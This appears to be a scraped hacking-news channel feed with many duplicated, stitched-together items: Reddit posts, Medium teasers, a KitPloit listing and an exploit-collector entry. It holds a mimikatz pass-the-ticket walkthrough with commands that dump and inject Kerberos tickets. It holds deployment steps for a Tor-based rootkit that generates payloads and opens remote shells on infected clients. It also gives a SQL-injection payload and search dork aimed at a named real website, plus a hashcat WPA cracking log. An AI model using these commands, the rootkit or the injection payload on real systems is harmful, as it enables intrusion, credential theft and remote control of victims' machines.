Automate finding relational vulnerabilities for a more accurate risk ratingContinue reading on Medium » (https://curtbraz.medium.com/a-konami-code-for-vuln-chaining-combos-1a29d0a27c2a?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
A Konami Code for Vuln Chaining Combos
Automate finding relational vulnerabilities for a more accurate risk rating
A Konami Code for Vuln Chaining Combos
Automate finding relational vulnerabilities for a more accurate risk ratingContinue reading on Medium »
Read more...
Automate finding relational vulnerabilities for a more accurate risk ratingContinue reading on Medium »
Read more...
A question about internal(network?) pentesting.
https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/
Hey everyone i wonder your thoughts about internal pentesting and platforms like hackthebox(not the prolabs, just the machines). First of all one might say that there isn't such a thing as internal pentesting, but what i mean is an assumed breach and assessment of the internal network. Is it possible to be not that good at htb and do an internal assessment? I dont like hacking the machines at htb, can only hack medium to hard boxes and during those times i mostly get bored after some time(not because machines are not challenging, quite the opposite, i get stuck). I am mostly interested in AD environment, coding injectors, c2 structures for easy tasks in different languages and analyze them in debuggers etc, in a home lab. For context: i dont work in IT, i am just a hobbiyst. Probably wont/can't switch to IT either. Just curious about your thoughts on platforms like htb. submitted by /u/throwforadvent (https://www.reddit.com/user/throwforadvent)
[link] (https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/) [comments] (https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/
Hey everyone i wonder your thoughts about internal pentesting and platforms like hackthebox(not the prolabs, just the machines). First of all one might say that there isn't such a thing as internal pentesting, but what i mean is an assumed breach and assessment of the internal network. Is it possible to be not that good at htb and do an internal assessment? I dont like hacking the machines at htb, can only hack medium to hard boxes and during those times i mostly get bored after some time(not because machines are not challenging, quite the opposite, i get stuck). I am mostly interested in AD environment, coding injectors, c2 structures for easy tasks in different languages and analyze them in debuggers etc, in a home lab. For context: i dont work in IT, i am just a hobbiyst. Probably wont/can't switch to IT either. Just curious about your thoughts on platforms like htb. submitted by /u/throwforadvent (https://www.reddit.com/user/throwforadvent)
[link] (https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/) [comments] (https://www.reddit.com/r/redteamsec/comments/qngvrk/a_question_about_internalnetwork_pentesting/)
___________________________
@hacking_Attack
@Hacking_Video
Reddit
r/redteamsec on Reddit: A question about internal(network?) pentesting.
Posted by u/throwforadvent - 1 vote and 12 comments
Having issues performing PTT with Windows 2019DC using mimikatz
https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/
Hello, So full disclaimer, I am DFIR guy with a little pentesting experience not a red teamer. Anyway I am trying to demo a PTT attack using mimikatz in a simple lab environment that consists of. DC1 - domain controller on windows server 2019 Win10-1 - Up to date windows 10 Win10-2 - Up to data windows 10 To demo I first logged into Win10-2 with the DA account, logged off and then logged on as a domain user with local admin rights to the box. Defender is disabled because I'm just trying to demo what PTT looks like. Anyway here is what happens When I first logon and do a klist everything looks normal. ``C:\Users\sylvester>klist Current LogonId is 0:0x604779 Cached Tickets: (2) #0> Client: sylvester @ LAZERKITTENS.LOCAL Server: krbtgt/LAZERKITTENS.LOCAL @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/5/2021 11:10:00 (local) End Time: 11/5/2021 21:10:00 (local) Renew Time: 11/12/2021 11:10:00 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: DC1.LazerKittens.local #1> Client: sylvester @ LAZERKITTENS.LOCAL Server: LDAP/DC1.LazerKittens.local/LazerKittens.local @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 11/5/2021 11:10:20 (local) End Time: 11/5/2021 21:10:00 (local) Renew Time: 11/12/2021 11:10:00 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: DC1.LazerKittens.local`` Then I go ahead and run mimikatz, get debug using privilege::debug and dump the tickets using sekurlsa::tickets /export mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::tickets /export ---snip After I export the tickets I loaded the administrator accounts TGT ticket into memory using kerberos::ptt mimikatz # kerberos::ptt [0;21701a]-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi (mailto:-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi) File: '[0;21701a]-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi (mailto:-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi)': OK ###### go in to a command prompt by typing misc::cmd and klist again. As expected the administrator ticket is now in my kerberos cache. C:\Users\sylvester\Desktop\mimikatz_trunk\x64>klist Current LogonId is 0:0x604756 Cached Tickets: (1) #0> Client: Administrator @ LAZERKITTENS.LOCAL Server: krbtgt/LAZERKITTENS.LOCAL @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/5/2021 10:09:39 (local) End Time: 11/5/2021 20:09:39 (local) Renew Time: 11/12/2021 10:09:39 (local) Session Key Type: Kerberos DES-CBC-CRC Cache Flags: 0x1 -> PRIMARY Kdc Called: So at this point I'm thinking cool, all I need to do now is access my DC is type in dir \DC1\c$. However, when I attempt that I get the following error message. C:\Users\sylvester\Desktop\mimikatz_trunk\x64>dir \dc1\c$ The system cannot contact a domain controller to service the authentication request. Please try again later. If I do a klist purge and try to access the dc again I get the expected access is denied. Thanks in advance for your help! submitted by /u/Mufassa810 (https://www.reddit.com/user/Mufassa810)
[link] (https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/) [comments] (https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/
Hello, So full disclaimer, I am DFIR guy with a little pentesting experience not a red teamer. Anyway I am trying to demo a PTT attack using mimikatz in a simple lab environment that consists of. DC1 - domain controller on windows server 2019 Win10-1 - Up to date windows 10 Win10-2 - Up to data windows 10 To demo I first logged into Win10-2 with the DA account, logged off and then logged on as a domain user with local admin rights to the box. Defender is disabled because I'm just trying to demo what PTT looks like. Anyway here is what happens When I first logon and do a klist everything looks normal. ``C:\Users\sylvester>klist Current LogonId is 0:0x604779 Cached Tickets: (2) #0> Client: sylvester @ LAZERKITTENS.LOCAL Server: krbtgt/LAZERKITTENS.LOCAL @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/5/2021 11:10:00 (local) End Time: 11/5/2021 21:10:00 (local) Renew Time: 11/12/2021 11:10:00 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0x1 -> PRIMARY Kdc Called: DC1.LazerKittens.local #1> Client: sylvester @ LAZERKITTENS.LOCAL Server: LDAP/DC1.LazerKittens.local/LazerKittens.local @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 11/5/2021 11:10:20 (local) End Time: 11/5/2021 21:10:00 (local) Renew Time: 11/12/2021 11:10:00 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: DC1.LazerKittens.local`` Then I go ahead and run mimikatz, get debug using privilege::debug and dump the tickets using sekurlsa::tickets /export mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::tickets /export ---snip After I export the tickets I loaded the administrator accounts TGT ticket into memory using kerberos::ptt mimikatz # kerberos::ptt [0;21701a]-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi (mailto:-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi) File: '[0;21701a]-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi (mailto:-2-0-40e10000-Administrator@krbtgt-LAZERKITTENS.LOCAL.kirbi)': OK ###### go in to a command prompt by typing misc::cmd and klist again. As expected the administrator ticket is now in my kerberos cache. C:\Users\sylvester\Desktop\mimikatz_trunk\x64>klist Current LogonId is 0:0x604756 Cached Tickets: (1) #0> Client: Administrator @ LAZERKITTENS.LOCAL Server: krbtgt/LAZERKITTENS.LOCAL @ LAZERKITTENS.LOCAL KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 11/5/2021 10:09:39 (local) End Time: 11/5/2021 20:09:39 (local) Renew Time: 11/12/2021 10:09:39 (local) Session Key Type: Kerberos DES-CBC-CRC Cache Flags: 0x1 -> PRIMARY Kdc Called: So at this point I'm thinking cool, all I need to do now is access my DC is type in dir \DC1\c$. However, when I attempt that I get the following error message. C:\Users\sylvester\Desktop\mimikatz_trunk\x64>dir \dc1\c$ The system cannot contact a domain controller to service the authentication request. Please try again later. If I do a klist purge and try to access the dc again I get the expected access is denied. Thanks in advance for your help! submitted by /u/Mufassa810 (https://www.reddit.com/user/Mufassa810)
[link] (https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/) [comments] (https://www.reddit.com/r/redteamsec/comments/qniix3/having_issues_performing_ptt_with_windows_2019dc/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Having issues performing PTT with Windows 2019DC using mimikatz
Hello, So full disclaimer, I am DFIR guy with a little pentesting experience not a red teamer. Anyway I am trying to demo a PTT attack using...
Tor-Rootkit - A Python 3 Standalone Windows 10 / Linux Rootkit Using Tor
http://www.kitploit.com/2021/11/tor-rootkit-python-3-standalone-windows.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/11/tor-rootkit-python-3-standalone-windows.html
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
A Python 3 (https://www.kitploit.com/search/label/Python%203) standalone Windows 10 (https://www.kitploit.com/search/label/Windows%2010) / Linux Rootkit. The networking (https://www.kitploit.com/search/label/Networking) communication get's established over the tor network.
Disclaimer
Use for educational purposes only.
How to use
Clone the repo and change directory: git clone https://github.com/emcruise/TorRootkit.git
cd ./tor-rootkit Build docker container: docker build -t listener . Run docker container: docker run -v $(pwd)/executables:/executables/ -it listener Deploy the executables: When the listener is up and running it generates a "executables" directory containing different payloads for different plattforms. TorRootkit/
│ ...
└ executables/
Note: The client can take some time (20s-30s) to connect because PyInstaller executables are a bit slower and it need's to start tor.
Features
Standalone executables for Windows and Linux, including python interpreter and tor the whole communication works over tor hidden services (https://www.kitploit.com/search/label/Hidden%20Services) which guarantees some degree of anonymity The Listener (https://www.kitploit.com/search/label/Listener) can handle multiple clients The Listener generates payloads for different platforms on startup
Listener Shell Commands
Command Explanation help Shows the help menu ^C or exit Exits the shell list lists all connected clients with their according index select start shell with client
Client Shell Commands
Command Explanation help Shows the help menu ^C or exit Exits the client shell and returns to listener shell os Executes a command in the clients shell and returns the output background Keeps the connection to a client and returns to listener
Contribution
Any contributions are appreciated. Make a pull-requests and I'll merge if it passes my automatic tests.
Download Tor-Rootkit (https://github.com/emcruise/tor-rootkit)
___________________________
@hacking_Attack
@Hacking_Video
Disclaimer
Use for educational purposes only.
How to use
Clone the repo and change directory: git clone https://github.com/emcruise/TorRootkit.git
cd ./tor-rootkit Build docker container: docker build -t listener . Run docker container: docker run -v $(pwd)/executables:/executables/ -it listener Deploy the executables: When the listener is up and running it generates a "executables" directory containing different payloads for different plattforms. TorRootkit/
│ ...
└ executables/
Note: The client can take some time (20s-30s) to connect because PyInstaller executables are a bit slower and it need's to start tor.
Features
Standalone executables for Windows and Linux, including python interpreter and tor the whole communication works over tor hidden services (https://www.kitploit.com/search/label/Hidden%20Services) which guarantees some degree of anonymity The Listener (https://www.kitploit.com/search/label/Listener) can handle multiple clients The Listener generates payloads for different platforms on startup
Listener Shell Commands
Command Explanation help Shows the help menu ^C or exit Exits the shell list lists all connected clients with their according index select start shell with client
Client Shell Commands
Command Explanation help Shows the help menu ^C or exit Exits the client shell and returns to listener shell os Executes a command in the clients shell and returns the output background Keeps the connection to a client and returns to listener
Contribution
Any contributions are appreciated. Make a pull-requests and I'll merge if it passes my automatic tests.
Download Tor-Rootkit (https://github.com/emcruise/tor-rootkit)
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
hacking: security in practice
Hashcat issue
Hello everyone,
I have the necessary tools installed for my NVIDIA graphics card on Pop!OS to use hashcat, but I get the following error.
Note, I installed the tools (drivers) from the nvidia site, and hashcat is the newest version.
What is the problem?
truexfalse@pop-os:~$ hashcat -m 22000 '/home/truexfalse/Downloads/14640_1636113653.hc22000' '/home/truexfalse/Desktop/wordlists/kinitaCommon.txt'
hashcat (v6.1.1) starting...
* Device #1: This hardware has outdated CUDA compute capability (3.5).
For modern OpenCL performance, upgrade to hardware that supports
CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: This hardware has outdated CUDA compute capability (3.5).
For modern OpenCL performance, upgrade to hardware that supports
CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetCurrPcieLinkWidth(): Not Supported
nvmlDeviceGetClockInfo(): Not Supported
nvmlDeviceGetClockInfo(): Not Supported
nvmlDeviceGetTemperatureThreshold(): Not Supported
nvmlDeviceGetTemperatureThreshold(): Not Supported
nvmlDeviceGetUtilizationRates(): Not Supported
CUDA API (CUDA 11.4)
* Device #1: NVIDIA GeForce GT 710, 1847/2000 MB, 1MCU
OpenCL API (OpenCL 3.0 CUDA 11.4.153) - Platform #1 [NVIDIA Corporation]
* Device #2: NVIDIA GeForce GT 710, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
cuLinkAddData(): the provided PTX was compiled with an unsupported toolchain.
* Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl link failed. Error Log:
ptxas application ptx input, line 9; fatal : Unsupported .version 7.5; current version is '7.4'
* Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.
Started: Fri Nov 5 23:24:46 2021
Stopped: Fri Nov 5 23:24:50 2021
submitted by /u/truexfalse
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hashcat issue
Hello everyone,
I have the necessary tools installed for my NVIDIA graphics card on Pop!OS to use hashcat, but I get the following error.
Note, I installed the tools (drivers) from the nvidia site, and hashcat is the newest version.
What is the problem?
truexfalse@pop-os:~$ hashcat -m 22000 '/home/truexfalse/Downloads/14640_1636113653.hc22000' '/home/truexfalse/Desktop/wordlists/kinitaCommon.txt'
hashcat (v6.1.1) starting...
* Device #1: This hardware has outdated CUDA compute capability (3.5).
For modern OpenCL performance, upgrade to hardware that supports
CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: This hardware has outdated CUDA compute capability (3.5).
For modern OpenCL performance, upgrade to hardware that supports
CUDA compute capability version 5.0 (Maxwell) or higher.
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetCurrPcieLinkWidth(): Not Supported
nvmlDeviceGetClockInfo(): Not Supported
nvmlDeviceGetClockInfo(): Not Supported
nvmlDeviceGetTemperatureThreshold(): Not Supported
nvmlDeviceGetTemperatureThreshold(): Not Supported
nvmlDeviceGetUtilizationRates(): Not Supported
CUDA API (CUDA 11.4)
* Device #1: NVIDIA GeForce GT 710, 1847/2000 MB, 1MCU
OpenCL API (OpenCL 3.0 CUDA 11.4.153) - Platform #1 [NVIDIA Corporation]
* Device #2: NVIDIA GeForce GT 710, skipped
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
cuLinkAddData(): the provided PTX was compiled with an unsupported toolchain.
* Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl link failed. Error Log:
ptxas application ptx input, line 9; fatal : Unsupported .version 7.5; current version is '7.4'
* Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.
Started: Fri Nov 5 23:24:46 2021
Stopped: Fri Nov 5 23:24:50 2021
submitted by /u/truexfalse
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Hashcat issue
Hello everyone, I have the necessary tools installed for my NVIDIA graphics card on Pop!OS to use hashcat, but I get the following error. Note,...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Subdomain Enumeration [TryHackme + Intro To Web Hacking]
https://cdn-images-1.medium.com/max/600/1*kngPe1D00sg6fyqBAviIyA.png
Learn the various ways of discovering subdomains to expand your attack surface of a target.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Subdomain Enumeration [TryHackme + Intro To Web Hacking]
https://cdn-images-1.medium.com/max/600/1*kngPe1D00sg6fyqBAviIyA.png
Learn the various ways of discovering subdomains to expand your attack surface of a target.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Subdomain Enumeration [TryHackme + Intro To Web Hacking]
Learn the various ways of discovering subdomains to expand your attack surface of a target.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Los datos de la Dark Web se están filtrando más que nunca
https://cdn-images-1.medium.com/max/1522/0*OC7lrSfLe9oMcvYo
PUBLICADO EN 1 NOVIEMBRE, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Los datos de la Dark Web se están filtrando más que nunca
https://cdn-images-1.medium.com/max/1522/0*OC7lrSfLe9oMcvYo
PUBLICADO EN 1 NOVIEMBRE, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Los datos de la Dark Web se están filtrando más que nunca
PUBLICADO EN 1 NOVIEMBRE, 2021 POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
El troyano bancario Mekotio resurge con nuevas técnicas de ataque y sigilo
https://cdn-images-1.medium.com/max/1471/0*5y8_ZfQ7CBhHWqR4
PUBLICADO EN 3 NOVIEMBRE, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
El troyano bancario Mekotio resurge con nuevas técnicas de ataque y sigilo
https://cdn-images-1.medium.com/max/1471/0*5y8_ZfQ7CBhHWqR4
PUBLICADO EN 3 NOVIEMBRE, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
El troyano bancario Mekotio resurge con nuevas técnicas de ataque y sigilo
PUBLICADO EN 3 NOVIEMBRE, 2021 POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Khamenei.ir SQL Injection
https://4.bp.blogspot.com/-ILIpsq3JVDo/WWlvQ8IjxbI/AAAAAAAAINI/veR2GTC9zzcP6cUZEvOZqGdUDt2RtL0uQCLcBGAs/s1600/h32.png
Khamenei.ir suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Khamenei.ir SQL Injection
https://4.bp.blogspot.com/-ILIpsq3JVDo/WWlvQ8IjxbI/AAAAAAAAINI/veR2GTC9zzcP6cUZEvOZqGdUDt2RtL0uQCLcBGAs/s1600/h32.png
Khamenei.ir suffers from a remote SQL injection vulnerability.
MD5 |
17d6bc18adc607b89ff1fc1ffd9f720cDownload
################################################## ################################################## #####################
# #
# Exploit Title : Khamenei.ir has SQL Inj vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : khamenei.ir (https://farsi.khamenei.ir) #
# #
# Tested ON : Persian language version Host #
# #
# Security Risk : ~[Critical]~ #
# #
# Description : Description: All websites with this version used can be targeted #
# #
# DorK : "intext:"book-archive?nt="" #
# #
# #
# #
################################################## ################################################## #####################
Details :
the vulnerable file is "book-archive"
SQL Inj Expl0iTs :
https://farsi.khamenei.ir/book-archive?nt=99999999 Codes
Dem0 :
https://farsi.khamenei.ir/book-archive?nt=99999999%27 oR 6168693=6168693 aNd %276199%27=%276199
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Khamenei.ir SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Tor-Rootkit - A Python 3 Standalone Windows 10 / Linux Rootkit Using Tor
https://blogger.googleusercontent.com/img/a/AVvXsEhAUtAjcZl-79fqxehj5cCuE7uYVP9CMDVIgC_z3jrh96fRBklcjd-OVUN6UO0wwhTW3tOAkzGpufpnsnGDEn_GAuy4yeHfW___C3N5DzkGHeGATr9Jp3JDzzhgEKeCDmes2NSczltejyKp1MmB70e_TjmKoEy8fsA157fDT2UX3vV7octlhiSvkA3b9w=w640-h264
A Python 3 standalone Windows 10 / Linux Rootkit. The networking communication get's established over the tor network.
Disclaimer
Use for educational purposes only.
How to use
1. Clone the repo and change directory:
1. Build docker container:
1. Run docker container:
1. Deploy the executables: When the listener is up and running it generates a "executables" directory containing different payloads for different plattforms.
Note: The client can take some time (20s-30s) to connect because PyInstaller executables are a bit slower and it need's to start tor.
Features
* Standalone executables for Windows and Linux, including python interpreter and tor
* the whole communication works over tor hidden services which guarantees some degree of anonymity
* The Listener can handle multiple clients
* The Listener generates payloads for different platforms on startup
Listener Shell Commands
Command Explanation
Client Shell Commands
Command Explanation
Contribution
Any contributions are appreciated. Make a pull-requests and I'll merge if it passes my automatic tests.
Download Tor-Rootkit
___________________________
@hacking_Attack
@Hacking_Video
Tor-Rootkit - A Python 3 Standalone Windows 10 / Linux Rootkit Using Tor
https://blogger.googleusercontent.com/img/a/AVvXsEhAUtAjcZl-79fqxehj5cCuE7uYVP9CMDVIgC_z3jrh96fRBklcjd-OVUN6UO0wwhTW3tOAkzGpufpnsnGDEn_GAuy4yeHfW___C3N5DzkGHeGATr9Jp3JDzzhgEKeCDmes2NSczltejyKp1MmB70e_TjmKoEy8fsA157fDT2UX3vV7octlhiSvkA3b9w=w640-h264
A Python 3 standalone Windows 10 / Linux Rootkit. The networking communication get's established over the tor network.
Disclaimer
Use for educational purposes only.
How to use
1. Clone the repo and change directory:
git clone https://github.com/emcruise/TorRootkit.git
cd ./tor-rootkit1. Build docker container:
docker build -t listener .1. Run docker container:
docker run -v $(pwd)/executables:/executables/ -it listener1. Deploy the executables: When the listener is up and running it generates a "executables" directory containing different payloads for different plattforms.
TorRootkit/
│ ...
└ executables/
Note: The client can take some time (20s-30s) to connect because PyInstaller executables are a bit slower and it need's to start tor.
Features
* Standalone executables for Windows and Linux, including python interpreter and tor
* the whole communication works over tor hidden services which guarantees some degree of anonymity
* The Listener can handle multiple clients
* The Listener generates payloads for different platforms on startup
Listener Shell Commands
Command Explanation
helpShows the help menu ^Cor exitExits the shell listlists all connected clients with their according index select start shell with client Client Shell Commands
Command Explanation
helpShows the help menu ^Cor exitExits the client shell and returns to listener shell os Executes a command in the clients shell and returns the output backgroundKeeps the connection to a client and returns to listener Contribution
Any contributions are appreciated. Make a pull-requests and I'll merge if it passes my automatic tests.
Download Tor-Rootkit
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.